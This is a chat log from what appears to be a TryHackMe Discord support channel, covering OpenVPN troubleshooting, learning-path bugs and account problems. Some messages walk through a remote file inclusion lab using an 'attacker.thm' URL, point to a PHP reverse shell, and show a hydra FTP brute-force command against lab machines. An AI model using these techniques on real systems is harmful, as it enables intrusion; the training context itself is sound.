#site-support

yeah, you aren't closing that terminal to run the curl command are you?

Nope, running openvpn in the background with &

Do me a favor, don't background it and open a new term window or pane and run the curl command

Will do

lets see if there's any new output, and maybe check the journal log as well

Same result

No reply from https://10.10.10.10/whoami

Run the VPN troubleshooting script

https://github.com/tryhackme/openvpn-troubleshooting

MTU failed at 1000

That's what sent me here 😅

any ideas would be greatly appreciated

it works without issues on my laptop, I just can´t seem to get it work on my nethunter phone

I can ping google without issues

When trying to open a learning pathway I always get Jr Penetration Tester regardless of which pathway I choose. I've tried in both Chrome and Firefox. Anyone else having this problem?

TX pakets are increasing, RX packets are not

Opening the learning pathway from a bookmark or the actual THM site?

My bet is that it's something to do with the cell network hating your vpn connection; try setting the MTU option manually as an argument to the openvpn command or edit the config file

From the site

oops, responded to the wrong message

Could you send a ss from what you're trying to click?

What? Try clearing cache and history or opening in an incognito window

I{m connected to wifi not cell data, but I did think the same thing originally, but the ISPreplied that they are not to blame

most likely an assigned cookie that just needs cleared

or your browser's cache

I cleared the cache and tried using an incognito window. Neither worked.

Yeah, I wouldn't trust that. Depending on network congestion, I think it's pretty likely. Also wifi is less than reliable in a lot of situations as well, if there are a lot of devices connected to a home network I could easily see that thrashing the network as well.

So even if you click a path like 'Pre-Security' or 'Cyber Defense', it still takes you to Jr. Pentester?

I was able to find a link directly to the pathway I want but when I click on enroll it takes me to the Jr Penetration Tester page again

Yes, no matter which one I select.

Frustrating because I was working on the SOC pathway and can't continue.

right

did you try this link? https://tryhackme.com/path-action/soclevel1/join

I just clicked that link and it took me to Jr Pentester

It's odd that it does the same for both Chrome and Firefox

could be a thing where your account saves your last accessed path, and uses that for any links you try to click on.

tried making a new account and accessing the SOC path?

I created some custom paths in our management dashboard for our different classes, when ever I click the join link it takes me to the same path (i.e. click the CYB 331 path and it takes me to the CYB 453 path). I tried different browser, clearing cache and incognito. Seems like a problem similar to @strange oasis

I can get to it if I'm not logged in. As soon as I log in it takes me to Jr Pentester

it also happens if I click a generic THM path

@broken bear can you re verify me when you have a chance or point me in direction to do it 😁

send the !verify <token> command to the bot in a DM again

Definitely sounds the same.

I just logged in using Microsoft Edge. I have never been to TryHackMe using this browser before. Still takes me to Jr Pentester

maybe there is an issue on their backend that tracks the path you are on

will try switching to mobile data hotspot from my daily driver, see if it makes any difference

update: tried switching to mobile data

curl: (7) Failed to connect to 10.10.10.10 port 443 after 78 ms: Couldn't connect to server

curl fails this time instead of hanging there

Must be.

@broken bear need to update my token had not change discord accounts unfortunately so my token says it have one applied to this discord already

ping fails with TTL value exeeded

You just want the token unlinked to the current discord account I am replying to?

I hope this can be fixed quickly. I reupped my membership so I could complete the SOC pathway and now I'm at a standstill.

at least progress, i really think it's network related and not necessarily ovpn. If you change the MTU to 1000 and it still fails, try a different network? Maybe the starbucks or the public library will be better

any tips or steps to get better machine stability? Multiple rooms machines crashing on me under 5 minutes...

might want to report it to #site-bugs

Will do, thank you.

Gave +1 Rep to @quaint spindle

@broken bear yes please

will test on a different network later today

@strange oasis all of the SOC Level 1 rooms are listed here: https://tryhackme.com/path/outline/soclevel1
you might be able to go to each one indvidually

thanks a lot friend!

will update you once tested

Thank you! I will give that a try.

That worked. thanks again.

Great! Have fun

thanks juun veri the correct token thanks a million

Hello. I just checked out AWS path which is locked. After I opened the path i understood it was not available for me, so fine. But now i am kinda stuck in the path. Attempts to enroll in other paths just redirects me back to AWS path. I cannot open any other path. Seems crazy but has someone experienced it before?

ooh 2 people with the same problem

and there we go a third it happens to shadow too

@tawdry orbit seems something is messing up the changing of current active path for users keeping them stuck in a single one when trying to view the others

Hi all— I can’t seem to select any other learning path on the site

I want to switch over to a different one but every link takes me back to my current enrollment

Anyone experienced this before? Is this a site bug?

Ah! Indeed

Yes you are not the first

Ok I’m not going insane. Thank you

Forwarding this one. It seems to be with any path switch, not just from AWS to another path. Thank you for reporting. 🙂

Thanks!

Gave +1 Rep to @tawdry orbit

Yeah it seems like it. Thanks!

Gave +1 Rep to @tawdry orbit

yuup can confirm.. it is happening with some for junior pentester
and for shadow with offensive pentesting

We're looking at the issue at the moment. 🙏

uh I can't seem to change my email to my student email (which I hope is supported since it's @du.se)

Swedish university (Dalarna University)

ok it finally worked, weird. Must have been a bug or request overload 👍

@rough totem @bronze escarp @strange oasis @plush bay Should be working now. 🥳

It's back to normal, thanks for the quick response!

Gave +1 Rep to @tawdry orbit

Thank you, all good now.

Gave +1 Rep to @tawdry orbit

Hi guys, tested on different network with same results

Same output for the ts script, MTU value failed at 1000, aborting MTU check

Tried setting the MTU on the IF to 900 but same thing

Tried 1460, 1300, 1200, 1000, 900, all yield same results

I tried again on my laptop running kali on WSL2 which used to work but for some reason that ain't working either

@broken bear

we have exhausted my knowledge of what i've seen to troubleshoot. Best bet for the next step is to email support, i think

Thanks a lot for your help and patience, will email support

anyone here?

hi there

i have problem with logging into my account

Can OpenVPN work on a mobile 3G hotspot ?

It's touch and go, it works for some, but not others, and not 100%

What sort of problem?

Just ask 🙂

login failure

and forget password don't work

my account name is aelwalol

and i forget the linked email

but iam sure it's one of 2 email

and the problem is conflict email address and login with google feature

If you didn't sign up with google, you can't use it to log in.

You'll need to email support.

!email

I got "Connection Timeout" when I tried to connect OpenVPN. Is anyone else experiencing the same problem?

For more context, what are you trying to do?

I just try to connect with my conf. file (EU VIP1). I seems connected in the access page but it's not.

That page can be bugged,

Do you have an error?

I get Connection Failed on OpenVPN GUI

Oh wait, GUI.

Are you on Windows?

and yeah thats bugged sometimes it's connected sometimes not

yes

As your host?

yes

I'd suggest not using your host on the network.

I'd create a VM, if you have the resources.

I setted VM I want to connnect with NAT connection on my host

Is it possible

The VM will connect with NAT.

I use NAT for my vm's.

And you suggest to set openvpn on vm right?

You won't need to.

You just need to download your configuration file and connect with

sudo openvpn path/to/file/*username*.ovpn

That will create a tunnel to the THM machines.

Ok. I'm on windows host. My vm is linux so I should use on vm

Yes

thank you I will try

Openvpn issue still there

I have an issue with my account, I reactivated premium on 13 July - worked for 1-2 days and now it says I do not have premium anymore.

Any help with the openvpn connection

Solved

Check DMs

Anyone know how to get the discount voucher for the merch? The 5% off for the 45 day streak

quite sure it applies automatically but good question

May just take a second to send out but will see! thanks for the response

Gave +1 Rep to @plush bay

You need to E-mail support.

think one of the people with thm staff could probably answer.... not so much anyone else

!email

yeah that is a good route too

It's the only route 😄

so does this imply shadow has missed out on their 5% discount for all their purchases on the swag store???

don't really care as would like to support tryhackme with more money anyways

Yes.

You could probably ask Jabba for it now xD

because they nevered messaged for a a discount code

good to know and thanks scrubz.. will ask jabba whenever they are around if shadow remembers

Gave +1 Rep to @weary spindle

With the amount of users in THM, and it was manual, Jabba would spend all day E-mailing people.

contact support via email for the discount code.... sorry was incorrect in the info shadow shared

Sent them an email. thanks

Gave +1 Rep to @plush bay

yeah shadow just thought it was some automation setup for it but apparently not

Is there any option to change username now ?

click this button in the lower right corner of the tryhackme website:

then from there use the send a message and then help with my account then i would like to change my username

Ty for help, Just a question, Changing username can have any effect on stats?

Gave +1 Rep to @plush bay

your points and badges??? or your activity feed??? nope should not change after you get a new username

Oh kk . ty again

no problem

https://stackoverflow.com/questions/76717491/im-facing-a-problem-i-cannot-slove-in-openvpn-like-tryhackme-or-hackthebox
if anyone can help me with this

you need username@ip

nah not necessary see my phone network works 100% i just want Initial connection

you use local VM on THM attack box ?

and what room is that?

Everything body is having issues with their phone networks these days, wonder if something is fished to stop making it work.

@north tulip you'll also need to regenerate your vpn, you'll also be assigned a new tun ip.

It wasn't me asking

nvm btw

I referred to when you change your username.

I should have made that cleaerer

nvm :>

Yo does someone here know how can I paste into a windows machine in the browser RDP seem to work very poorly for me

There should be like a little tag on the left side that you can expand. Then select the middle button. From there it should work

If you put it in full screen mode, it should access your clipboard.

I already paid my subscription last 2 days but until now it says Payment Pending
You will automatically be navigated away from this page when the payment is confirmed. help me

this is the guide for subscribers for which path they should take but i cannot seem to find the link for CC:Pentesting path

Cc pentesting has been removed from the site due to being too old, iirc

Must be A|B testing.

I know the website is being re-designed.

must be a hacker*

I still have the old design here

Hey can someone help me please?

I will no longer be able to access my account, so I need to at least cancel my subscription.

I had an autogenerated password by my browser to my THM account AND to my Email. My computer won't boot so I lost access to both Email and THM account.

I can easily create a new THM account, but the old one would be renewing the subscription and taking my money.

!email

cc @bronze vale can they contact their bank to stop it while waiting for a response from support?

Was it a password manager?

It was the built-in keychain in Firefox but I wasn't using a account.

I tried everything so my only option is cancelling the subscription somehow..

I do have the account paired with my Google Authenticator app on my phone, but I doubt that will help

Not really no

How's the support response time these days?

Just so we can advise members who wish to contact.

It’s still the same, it should hopefully be saying 1w for the response time, a few users are neglecting to read it though

Hello, I keep getting disconnected from machines in every five seconds or less. My internet connection is good, I don't know what is wrong. It used to be fine but now it is impossible to do the tasks.

why doesnt telnet work for the target's ip on my kalininux (stuck on "trying") but it works on the site's ran machines?

Trying 10.10.243.72...
tenlet: Unable to connect to remote host: Connection timed out

Where is that IP address from?

THM room, its just about port 8012

I got my account back, if anyone from support sees this, there's no need to cancel the subscription anymore.

I think support will email you back confirming you want it deleted.

TY!

Hey, please DM me your email address 🙂

You sure? :p

I think I seen Jabba say that once.

I wouldn't count on it 🙂

Before tickets we would ask, now that we use a ticket system, you are manually inputting your information which is all the confirmation we need 🙂

Ah, got ya

Sent 🙂

mr.robot i start machine and dialog box with timer no longer comes up with the room discontinued?

is*

We have set the room private for some maintenance :)

ah well that would explaine thanks

Same experience on 4 different networks

Just latency, however I thought tryhackme would have servers close to Australia

Can you plug it in #1130565893592723638 ?
(Just if more people will ask)

Let me see if I am allowed 😆

Marta can😅

I have write permission, but not sure if I am allowed to add rooms there hah]

Go bother your coworkers

Already have :P

sed -i 's/bother/bless/g'

Error: kindness not found

everythang jabba is a blessing

Yeah, and now I can only bless you with work stuff and not discord stuff

indeed 😄

almost like that was the plan

Bot is broken

Which?

I'll take over the Discord, nobody can stop me! Muhahah

https://tenor.com/view/i-would-like-to-see-it-smug-meme-monique-gif-13196153

It was just to mess with Ben😅

I mean I can break it to prove a point

You aimed at Ben but accidentally shot me:(

that i'm veyr good at

I bet I can break @marble breach with one command 😆

You step into the bullet

so can I, sudo shutdown now 😛

So can I!
!help

Translated text: hi

QUE?!

It's not meant to do that

I mean I suppose it's technically right. translating english into english lmfao

Room is fixed

It is supposed to crash due to an issue with... I don't know... it just doesn't haha

Lmfao I like that the “not working as intended” is the fact that it is working

/translate

Room: Windows Privilege Escalation

Task 6, Machine is starting but wont show the gui

really??? does windows clear logs at reboot/restart???

me
121141
borgqueen se
was awarded a badge
, 7 .
Level ;
vi Sie 3
Hash Cracker :
Cracking all those hashes
Come learn all things security at TryHackMe

so looks like it is some saved data for a badge reward if you clear out the \n new line chars

the other picture looks like jumbled encoded data parsed as unicode though

still would encourage someone like @bronze vale or someone else maybe look into the above

What extension is the file

You said it was on your desktop, right?

So close it and then view the file extension

Might have just been a temporary file

hidey ho neighborinos! i'm having the dangedest problem trying to access the network on the 'breaching ad' room.

yes have the vpn for breachingad

changed DNS in NetworkManager to the thmdc IP..also did a systemctl restart networkmanager after

but when i nslookup or try to ping, host is unreachable. i also tried the resolv.conf file !! no joy

i'm beginning to think it was my VM networking but i've tried both NAT network and bridged. i'm outta ideas

i followed two walkthroughs haha no luck

Check the pins in #breaching-ad

I used what's suggested in the forum. I have a script that modify somethings but I still get caught with it.

Is it normal that the IP Address in the "Active Machine Information" is different from the AttackBox IP Address?

I'm doing the Jr Pen Tester, I'm at File Inclusion and I'm supposed to have a file called cmd.txt, but when i type it in my browser (http://10.10.x.x./cmd.txt)

One IP says Not Found
And the second IP says Error code 405

I tried restarting everything many times, but I always get a different IP at the top of the THM page (next to my hacking streak) and a different IP inside the AttackBox

You're confusing the AttackBox with the machine that you deploy in the task.

The AttackBox is deployed using the blue "Start AttackBox" button at the top of the room, the target/vulnerable machine is the one that is deployed using the green "Start Machine" button.

There will be a card at the top of the room that will display the IP address that you are supposed to attack. The IP at the top of the THM page next to your hacking streak is either your AttackBox (not the machine you're supposed to target), or the IP address of your VPN connection 🙂

Ohh makes sense thank you.

Any idea why I can't access the cmd.txt file?

Gave +1 Rep to @zealous yoke

#1 is the AttackBox (via the Start AttackBox button)
#2 is the IP address of the machine that you need to target or interact with. In this case, it is 10.10.231.210. So, using your example, I would need to access 10.10.231.210/cmd.txt

you would replace that with whatever is displayed in that card (#2)

Mhhm okay. That is the correct ip 🤔

Let me double check the room - I haven't done it for a while. What task are you on?

Yeah it's strange, its Task 6

Okay, so it looks like that IP/cmd.txt is just an example?

And just below, it asks you to try out an RFI attack. I would presume that the machine is configured so that /cmd.txt can only be get through a certain way.

I get what you mean but i tried that too

I sent the wrong screen actually but yeah I did try multiple things

This is the correct link I believe, but doesn't work

Ah, okay I understand now

Right so essentially:

1. You need to create and host the cmd.txt from your machine (I.e. Kali) using something such as python server for example:

Let's say that the attacker hosts a PHP file on their own server http://attacker.thm/cmd.txt where cmd.txt contains a printing message Hello THM

2. http://attacker.thm/cmd.txt in the http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt needs to be the IP address of your machine.

3. Say I create a file name cmd.txt and fill it with cmnatic on my Kali, which has a VPN IP of 10.14.32.16, I would do: http://webapp.thm/index.php?lang=http://10.14.32.16/cmd.txt that should display cmnatic on the site

Haven't tested, but I think that's my understanding of what the task is wanting you to do after having a re-read of it

Yes I tried creating the .txt file using echo whatsup > cmd.txt in the terminal

but that didnt help

So i guess im supposed to find how to "host the file" ?

Okay yup so echo whatsup > cmd.txt is the first step. But now you need to "host" the file so that the remote machine can access it. Something like a python http server is really quick and easy for this: python 3 -m http.server

Oh okay I've got it. I can show you what needs to be done. Wanna hop in VC and I can share my screen/talk through it?

Yea sure that'd be great

we can go to https://discord.com/channels/521382216299839518/794951289951092766 I'll be there in a minute 🙂

@zealous yoke Thank you so much mate 💪

Gave +1 Rep to @zealous yoke

You're more than welcome. Lot of info take on board but hopefully that was helpful 😄

Very helpful 👍

no but sounds like something that would be interesting but don't think aws supports mac virtual machines for target machines

not currently unfortunately. I have a room on iOS forensics but that's pretty much it for anything mac. This is because it is extremely hard to virtualise and such

AWS do, however, it is extremely costly, and IIRC, there is minimum deploy time on mac instances on AWS. If I remember right, AWS will force you to run the Mac instance for a minimum of 24 hours

ah

well then that is not happening easily

at least not at the moment

Not that I can think off on the top of my head. Could be a tool saving a HTTP request or something - hard to tell without knowing what you were doing at the time the file was created

ah mhhm strange. Yeah, I'm not entirely sure to be honest with you 😅

jabba asked around about it earlier too

so it is a bit of a mystery and without much info on it we can do near null

how do the scoreboards in challenge rooms work? looks like It's always just 10 random users

the first 10 completers shadow thinks

with blood points to the person that answered the task question first

Sorted on points, the user viewing is always at spot 10 unless they have more points than spots 1 to 9.

i don't see any blood points - all the 1-9 spots have the same amount of points

Not all rooms have blood points, usually only challenges, but sometimes walkthrough rooms.

also the dates got me confused - for example https://tryhackme.com/room/easyctf shows first 9 completions in a span of more than a year which is hard to believe

expecially since

85429 users are in here and this room is 1432 days old.

i've seen a few questions, but no real answers. i have a 45+ day streak and am looking for 5% off, but I received no coupon code and the prices are the same in the store. What am I missing?

Hey ya'll. I need help. Trying to terminate machine, and when I press button to terminate, it terminates but really doesn't, I reload page. It still has time counting down. I have done this numerous time. Cleared Cache and still same issue. This is really weird. I will let the time runout and see if the machine is still running but why do that?! I need to know why it is acting like I never pressed the terminate button!!!!

I am assuming your good now? I am having the same problem you were. What is the cause of it? Why do I have to wait for time to runout for it to self terminate. This is very frustrating and I don't have time like that

I also tried : fetch("/api/vm/running")
.then((r) => r.json())
.then((vms) =>
vms.forEach((vm) => {
if (vm.roomId === "kali") {
return;
}
fetch("/api/vm/terminate", {
method: "POST",
body: JSON.stringify({ code: vm.roomId }),
headers: {
"csrf-token": csrfToken,
"Content-Type": "application/json",
},
});
})
)

Doesn't work

for me at least

Im just gonna go to bed, wake up and see whats up, I have an hour and some change left on machine. i'll come back with update...

Try this one,

fetch('/api/vm/running')
  .then(r => r.json())
  .then(vms =>
    vms.forEach(vm =>
      fetch('/api/vm/terminate', {
        method: 'POST',
        body: JSON.stringify({ code: vm.roomId }),
        headers: {
          'csrf-token': csrfToken,
          'Content-Type': 'application/json'
        }
      })
    )
  )

I've got a Kali VM that connects to THM via VPN. Do I need to worry about the VPN randomly disconnecting and causing me to do something malicious on the Internet?

i have problems with kali linux where can i get help

Hello, I have a problem with accessing the machine. I did the steps on this room https://tryhackme.com/room/openvpn
I started a machine at 10.10.105.136

At the end it says:

Go to http://10.10.105.136 - can you see a website?

But then I get the "connection timed out error" on the browser. I have the OpenVPN connected with the config from the access page.
Does anybody know why this happens?
I can't complete the room without accessing the machine from the browser...

@zealous yoke Hey bro I'm trying to do my first rev shell but I can't remember the website you visited to download some files

The reverse shell I used in the call is from here: https://github.com/pentestmonkey/php-reverse-shell 🙂

Thanks! I need to view the contents of "$_REQUESTS" on the website you used the rev shell on yesterday

Gave +1 Rep to @zealous yoke

Is there a easy way to do that?

File Inclusion Task 8 - flag 3

Hey, the VPN doesn't route your internet trafffic. For example, if you visit youtube.com it'll come from your ISP IP address.

Anything you do on the machines (i.e. 10.10) is "internal" 🙂

Hello, just a quick question. I submitted a writeup yesterday to vulnversity and it's under review, can i know how long is it going to take? Because i read in a forum it's all upto the owner of the room and you gotta let em know. So here I am

That probably won't be accepted.

Because the rooms old or?

Yes

Okay np

Is it posted on other forums? Even if it's not put on the writeups section, could still go to good use

Hi, I have finished the pentester jr route, but in the certificate, my name is wrong by one letter.

I would like you to help me correct the name of my certificate.

My username is: ZizuPM

Receive a cordial greeting.

#site-support message

@hello team, can someone support here or address me to the right room, please ?

Which sort of support do you require?

Despite the membership, I cannot login nor reset my login password. I have sent several emails but no feedback.can you support please ?

There is a 3 day wait for support.

However if you E-mail more than once, it will push you furhter back down the queue.

Ok, clear. Thanks for your answer ☺️

Hello there i have a problem i cant accsed to a machine altough i am connecting to the openvpn ?

does the attackbox work?

Yes it is working

some rooms have machines that haven't disabled firewall rules etc so i would use the attackbox. happens to me especially on the EternalBlue room

Oow i incounterd the problem in the owasp top 10 room in the injection challenge

so i should use the attack box not the host directly

yep i presume you mean the book site?

If it yes is there is nothing else to do ?

nope not really, you can report it in room-bugs but tbh most of the rooms are outdated

it shouldn't happen in the injection challenge, i thought you ment task 26

No in this challenge

I dont know it

you can access the website with vpn yes/no?

No i cant acces it with vpn neither normal connection

have you started the machine in task 2?

try restarting the machine

also check with "ss -tulpn" on how many openvpn connections you have

if you have more than 1 then kill the rest

remember that its on port 82 aswell

Yes it worked , i didnt start the machine from the first and secondly i specify it on port 82

so it works now?

Thank you so much @naive dust

Gave +1 Rep to @fierce flare

np

Yes it worked

hi

Hey

i have problem with

subscription

is there any support guy here

What is the problem , is there any one that could help you he / she will ?

i have paid my subscription fee

but i cant use my premium account

Is there any way to change card details without cancelling the subscription?

Thank you , it worked!

Gave +1 Rep to @weary spindle

Is https://tryhackme.chargebeeportal.com/ the correct link?

https://tryhackme.chargebeeportal.com/ i visit there

yes

#9518

ticket id is #9518

so when they help me 😦

i wanted to go ad lab

i made my payment already

Hello ~ apologies for bugging about this again, I have looked a the THM forum and found no answer to my problem. My prblem is I am still having issues with thm-troubleshoot script and recieving the following result below:

Update: I think i fixed with this

I found this link: https://community.ui.com/questions/OpenVPN-how-to-use-AES-256-CBC/78283e1c-7c5e-4ea5-8dbe-31d9ecb6a23d

when did you last regen your config?

Hello i have 2.6 openvpn and i did what appears in this article to make it work https://tryhackme.com/forum/thread/62bc5fb1fcafa700618f25f0 but then appears this problem https://ibb.co/CKP8100

do you know what i should do?

Can you verify your account and attach screenshot.

!docs verify

Hello i have 2.6 openvpn and i did what appears in this article to make it work https://tryhackme.com/forum/thread/62bc5fb1fcafa700618f25f0 but then appears this problem when i run my file of ovpn

Can you cat your openvpn file?

I believe I might have a solution to that, just need to switch my machine, one moment

yes

can i send it to your md?

try:
openvpn --data-ciphers 'AES-256-CBC:AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305' --config <path to config file>

i dont know if it have private things

Don't suggest this please.

Yes.

oh sorry I didn't know there's something wrong with this but it has been working for me

may I ask why it should not be suggested?

We like to suggest users either use the Troubleshoot script, or regen their vpn file,

We don't suggest this (by mods request)

• people shouldn't run code on their machines without knowign what it does.

• Some people suggest the sed code, and it doesn't just replace it one config, it changes them all, so they could have multiple .ovpn files in their folder, that may or may not no longer work.

Also, I doubt you, yourself will blindly run code without knowing what it does.

And I'm not a mod/staff, I'm just relaying what we have been asked to do, in this case.

Oh sorry I'm new to here, didn't know that's the case, just bumped into what feels like the exact same issue before and wanted to suggest a solution. By no means I would encourage to run any code blindly, and by sending the command I suspected that user will do the research on what the command does before running it.

Hi, I can't get a student discount on my subscription, I would appreciate it if someone could help.

If your email is not recognised, you'll need to send an E-mail to the following address

!email

I've also encountered one problem recently. During a specific timeframe (around 9 pm-11 pm CEST this Monday), I've not been gaining any points for answering questions (tried different rooms). Issue stopped occurring in the morning of the following day but points that I've gained during that timeframe (about 400 points) have not came back. I've written an email to support but have not received any response yet. Is it a known issue? Is there anything else I should try?

I can share much more details about this if needed. Did some tests during that time frame to confirm that (which I sadly have not recorded) and I'm 100% certain the issue was there, beyond any doubt. If I, lets say, created new account and completed all the same rooms I have completed now, there would be a ~400 points discrepancy between my current account and that new one.

Hello, I have sent an email to the support over a week ago about the student discount including verification but heard nothing back so far.

Dm me your email Address please

dm'ed!

The site's down? It's throwing 500

I'm setting up OpenVPN for TryHack me for the first time. Windows 11, fresh install.

The connection in OpenVPNGUI just keeps looping and the log shows this:

Client exception in transport_recv: crypto_alg: BF-CBC: bad cipher for data channel use

I run the program as admin. I'm using the latest version for win 11 on the site. I tried rebooting. Tried installing and uninstalling. I've tried different servers for OpenVPN. The connection exists in network settings.

Anybody have any ideas?

Okay, so I found the solution here: https://tryhackme.com/forum/thread/62bc5fb1fcafa700618f25f0

The thread is from a year ago, and the response from a community member 5 months old, but still a problem I see. I had to add a line to the config file:

cipher AES-256-CBC
data-ciphers AES-256-CBC

Just doing "data-cipher AES-256-CBC" or "cipher AES-256-CBC" independently was ineffective. Both lines had to be present and it connected immediately.

Update your config file generator please!

What VPN server are you using?

It sounds like you haven't regenerated your OpenVPN file

It defaulted me to EU-Regular-3 when I first generated one.

Then I tried EU-Regular-2
Then US-East-Regular-1
Then EU-Regular-1

Then I went back to 3 to continue troubleshooting and adding the lines to the config file are what solved it.

Did you press the "regenerate" button?

Yes. Each time.

Our OpenVPN servers are working fine

Don't know what to tell ya. I tried ever other setting change and troubleshooting recommendation I could. The config file line addition is the only thing that's worked.

I just regenerated and downloaded another config file just now and it did not work. Loaded the previous config with the line edit and it works instantly.

Does it hurt anything to add the line as a "cover all bases" approach?

Yes

In the newest versions of OpenVPN, the cipher line is becoming depreciated.
Soon, OpenVPN will not accept the cipher line and you will not be able to connect.

I see. Well like I said, each of those lines independently did not work. I got a different error message when just the cipher line was present.

But with both it was instant

We are looking to improve our infrastructure to ensure that our OpenVPN configurations are working for the newest versions of OpenVPN.

See here: #site-support message

Keep this conversation in mind if this issue crops up for others. There's other people on the forum also experiencing it and the same solution works for them. Even if ciphers is deprecated, the Server handshake code might still be looking for the line to be there for some arbitrary reason before it looks for the data-ciphers line. Thanks for being so prompt with responses and information though. Just glad I found a solution before I gave up.

Gave +1 Rep to @bronze vale

I try use OpenVPN in Windows using OpenVPN room. The VPN is connected. But I can't access the server.

There is warning in the log, mention about "sweet32 attack"

And there is "SESSION INVALIDATED KEEPALIVE_TIMEOUT"

Please help to solve the problem

Hey Scrubz just saw this ! Last time was like a couple weeks ago, Maybe a month ago can't remember. It's been a long while though

Gonna test here again after class. I'll hop on discord again around 12PM PST

@tawdry orbit @crystal marlin
Hello guys, good day. Pls I need to get through to Lilly, head of marketing
Can you be of help?

May I ask what it’s pertaining to?

Kindly accept fr

how do you earn the wireshark badge? i have completed all the wireshark rooms in the SOC path. what am I missing? thanks 😉

Feel free to send a DM. 🙂

Already passed it on

Thank you buddy 🫶

Gave +1 Rep to @bronze vale

I guess it’s been handled, I await Lilly’s response but hey, I still sent a fr

anyone know what to do if your streak gets reset before the day is over? any help is much appreichated 🙂

Am new here and am happy to subscribe this 🙂

Question; I just go to 'Dashboard' and take the challange one by one but in the footer, they say, "this room are free" (I have 'study' in 4 days now)

Should i just continue, and paid rooms will come later on
Or
I need to select room other places on the page?

the big amount of thm can be done without subscription. if you pay for sub there is more rooms to do.

Okay, thanks - So i should just continue from Dashboard?

if you go to Learn tab

there is path that you can follow to go with the flow in premade order to learn

I paid for subscription. Discount if you have student email. Worth the subscription. Lot of extra rooms

!email

Contact support. 🙂

i contacted support still waiting 😦

I regret paying

no support

integration problem between 2 software and no one here to help me :S

Support is going through a 3-4 day response time.

How long have you been waiting?

about 2 days

We’re on a 3-4 day wait time 🙂

oh yeahh 😄

wonderfull news

Hey, I opened my thm after a long time
and my account was banned
i didnt do anything wrong
please help me out

@bronze vale

Username? @somber musk

I've sent the email on Tuesday, but well, the support wait at that time was 5-7 days

DM me your email Address please

I am sorry, it was my test account

I was testing for any flaws in the new referral feature

My original one is safe

Sorry for the waste of your time

You’re aware that if you’re banned on one account.. you’re banned on them all right?

Sir, my other one is working fine

I have your username for your main account, please send your test account’s username or I will be forced to ban you.

sure sir

should I dm you?

Sure

Can someone from support help me get my account login back please?

Have you contacted via E-mail?

Hi Yes many times but never get a reply from them.

When was the last time you E-mailed?

the first time was 1st of June then 4 more times in that month and I have just sent another in the past 30min.

There is a current 3-4 day wait time, if you're not contacted before then, or support see this post, then wait patiently for a little longer please.

Since I have be waiting from the 1st of june I have been patiently.

DM me your email address please

Hello everyone, today i want to pratice my skills but when i start a machine, i cant pratice on the ip who thm gives me... idk why but that is the same for all challs

Are you using your OpenVPN gui on your Windows host?

#site-support message

Thanks u so much! Too bad it doesn't support windows anymore but thanks to that, I will add a linux's VM and improve himself on thm

Gave +1 Rep to @bronze vale

Done!

How can In copy text and files from my attack box to host machine. PS: Clipboard doesn't work

https://media.discordapp.net/attachments/692456966802374687/921063860318924800/clipboard.gif

There is a little arrow in-between the windows that allows you to paste into and then it will be accesable in the attackbox. Or you can hit the button to make the Attack box full screen which will launch a seperate window for it then copy/paste should work like normal

that does not work??

I have tried that. Gone full screen too. Still doesn't work

If you give the browser permission...

It doesn't.

hmm weird

I have also given the browser permission to my clipboard. Just verified now. Still Doesn't work

You mean to copy an entire file? Or just text?

Just text.

I am on the Threat Intelligence Tools lab and they didn't have to option to download lab files too.

When you try to paste into the attack box terminal are you using ctrl+shift+v ?

I am not trying to paste on the terminal. I am trying to copy text from the attackbox to my host pc.

Oh then no idea why the clipboard that Shadow showed a gif of should populate with the info when you copy out of an attack box

aaah

that specific room is not the attackbox

and the files on said target machine that opens in split view also uses some malware samples

so do not try and download said files onto your own machine

Ahh good catch Shadow

Then how am I supposed to get malware info as the machine doesn't connect to the internet? I am supposed to inspect the emails with phish tools but I am unable to 😦

step one.... read the 3-5 lines above the questions in the phishtool task

Scenario:
You are a SOC Analyst and have been tasked to analyse a suspicious email Email1.eml. With the skills learnt on this task and using Thunderbird, answer the questions below.
for those wondering what said lines say

the important part being using thunderbird

Hi I'm doing "Net Sec Challenge" and I can't connect to FTP server. Any issue with the server?

Attackbox or VM?

VM. Should I do it withi Attackbox?

Are you on the vpn?

yes

what's your target ip?

10.10.248.11

Did you nmap the machine at all?

yeah and I know the ftp port is 10**

Are you declaring it on the ftp command?

yes

it's strange coz hydra is giving me some trouble too

Can you send a screenshot?

I can connect to the FTP fine.

I'm trying hydra -L usersftp.txt -P /usr/share/wordlists/rockyou.txt -vV ftp://10.10.165.20:1021

1021?

Why 1021?

I discovered that port with nmap, I think

..Are you sure?

I think that's where your problems are coming from...

let me check it out

sorry 10021

Does it work now when you declare the correct port?

(if you're in a vm, you might not have rockyou.txt in the same location as the hint)

Yes it does thanks

Gave +1 Rep to @weary spindle

Is there a way to change the name on the certificate from my username to my full name? (I accidentally chose the username and now when I changed it to my full name the certificate does not get updated sadly)

sorry if i am in the wrong channel for these kind of questions :/

You can't change the name on a certificate after it's generated.

You'll need to either use paint, or create a whole new account

oh ok thanks for the answer :/ and for some reason the verification here does not work for me i dmed the bot with my token but yh...

The discord bot will have no effect on your certificate.

Unless you're trying to upload it here.

yes I know I just wanted to verify my account here its another problem besides the cert 😄

Did you use

!verify *discord token*

yes I did

Did you get an error message?

nope i didnt get any answer thats why I am kinda confused

Are your dm's open?

yes

@zealous yoke

Is the bot stuck again?

(Ping worked in bot commands)

I've pinged staff, there's nothing I can do, the verification should be instant.

ok ty anyways 😄 maybe it fixes itself idk

And due to my red teamer role, the bot no longer replies to me.

I've restarted it:)
should be good to go if you try again @oblique vapor

#room-ideas

hey guys im a bit new to all of this and i'm running into an issue connecting to openvpn. I went through the tutorial on downloading and installing it that was linked in the Linux Fundamentals Part 1 room. The install and setup seemed to go fine but i am stuck on connecting. after looking at the log file it seems im getting this error but I have no idea how to fix it.

[Jul 24, 2023, 14:02:18] Connected via TUN_WIN
⏎[Jul 24, 2023, 14:02:18] Per-Key Data Limit: 48000000/48000000
⏎[Jul 24, 2023, 14:02:18] Client exception in transport_recv: crypto_alg: BF-CBC: bad cipher for data channel use
⏎[Jul 24, 2023, 14:02:18] Client terminated, restarting in 2000 ms...
⏎[Jul 24, 2023, 14:02:18] SetupClient: signaling tun destroy event

any help would be appreciated

You can't openvpn in to Linux Fundemental 1.

hmm when i hit the question mark button after starting the machine it was under the use a vpn option, im assuming its just for later tasks then?

Different rooms.

However Linux Fundemental 1 has a split screen machine

Hello I have a question

ask away

I figured out I actually need a somewhat knowledge of link and how it works

